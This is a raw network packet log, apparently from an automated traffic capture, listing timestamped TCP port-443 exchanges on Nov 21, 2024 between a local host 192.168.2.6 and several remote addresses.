                                                                                                                                                                                                            Nov 21, 2024 15:17:18.567662001 CET4434972920.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.576143026 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.576186895 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.576215982 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.576236963 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.576246977 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.576251030 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.576327085 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.576334953 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.576361895 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.576379061 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.601070881 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.601105928 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.601183891 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.601201057 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.601238966 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.601258993 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.627096891 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.627144098 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.627213955 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.627222061 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.627279043 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.631302118 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.631337881 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.631418943 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.631488085 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.631524086 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.632092953 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.647845030 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.647891045 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.647972107 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.647984982 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.648034096 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.648058891 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.648282051 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.648339987 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.648367882 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.648390055 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.648426056 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.648447990 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.665745020 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.665770054 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.665958881 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.665982962 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.666670084 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.679177046 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.679228067 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.679260969 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.679269075 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.679338932 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.698753119 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.698777914 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.698903084 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.698911905 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.699645996 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.708441019 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.708504915 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.708569050 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.708575010 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.708667040 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.733871937 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.733917952 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.734024048 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.734030008 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.734069109 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.734096050 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.758358002 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.758382082 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.758495092 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.758514881 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.758567095 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.761639118 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.761717081 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.761744976 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.761756897 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.761800051 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.761823893 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.763802052 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.763814926 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.763911009 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.763921976 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.764514923 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.777405977 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.777434111 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.777545929 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.777565002 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.777618885 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.779198885 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.779225111 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.779306889 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.779323101 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.779340982 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.779448986 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.790024996 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.790050983 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.790155888 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.790164948 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.790216923 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.804717064 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.804781914 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.804836035 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.804866076 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.804896116 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.804913044 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.813977003 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.814006090 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.814121962 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.814193964 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.814306974 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.815768957 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.819088936 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.819149971 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.819192886 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.819205046 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.819258928 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.819277048 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.832628012 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.832680941 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.832753897 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.832783937 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.832808018 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.832834005 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.845175982 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.845210075 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.845294952 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.845319986 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.845361948 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.845405102 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.846848965 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.846893072 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.846934080 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.846946955 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.846986055 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.846987009 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.847003937 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.847012997 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.847076893 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.847084045 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.847131968 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.852199078 CET44349732188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.852346897 CET44349732188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.852435112 CET49732443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.863121986 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.863142967 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.863257885 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.863275051 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.863457918 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.864824057 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.864865065 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.864922047 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.864929914 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.864995956 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.865020037 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.880331039 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.880348921 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.880460978 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.880470037 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.880520105 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.883932114 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.883953094 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.884056091 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.884072065 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.884105921 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.884128094 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.887701035 CET49732443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.887722015 CET44349732188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.895616055 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.895637035 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.895721912 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.895730019 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.896090031 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.905607939 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.905658960 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.905751944 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.905782938 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.905833006 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.907533884 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.915486097 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.915532112 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.915610075 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.915621042 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.915657043 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.915682077 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.919526100 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.919557095 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.919605970 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.919611931 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.919658899 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.919686079 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.929322004 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.929351091 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.929408073 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.929414988 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.929482937 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.935309887 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.935381889 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.935440063 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.935447931 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.935503006 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.935530901 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.950606108 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.950649977 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.950707912 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.950764894 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.950799942 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.950820923 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.958112955 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.958182096 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.958225965 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.958242893 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.958281040 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.958307028 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.964148998 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.964205980 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.964261055 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.964271069 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.964323997 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.970524073 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.970545053 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.970627069 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.970645905 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.970738888 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.980715990 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.980732918 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.980797052 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.980808020 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.980865002 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.985054016 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.985075951 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.985136986 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.985143900 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.985205889 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.994203091 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.994221926 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.994318962 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.994327068 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.994400978 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.999484062 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.999502897 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.999578953 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.999587059 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:18.999644041 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.013163090 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.013183117 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.013287067 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.013295889 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.013346910 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.043901920 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.043927908 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.043983936 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.043998003 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.044044018 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.055953979 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.055977106 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.056075096 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.056082964 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.056132078 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.081746101 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.081768990 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.081864119 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.081876993 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.082108974 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.082473040 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.082492113 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.082535028 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.082542896 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.082587004 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.084893942 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.084965944 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.084992886 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.085062981 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.085100889 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.085150003 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.096349001 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.096368074 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.096400023 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.096443892 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.096452951 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.096456051 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.096520901 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.096528053 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.096554995 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.096585035 CET49728443192.168.2.6150.171.28.10
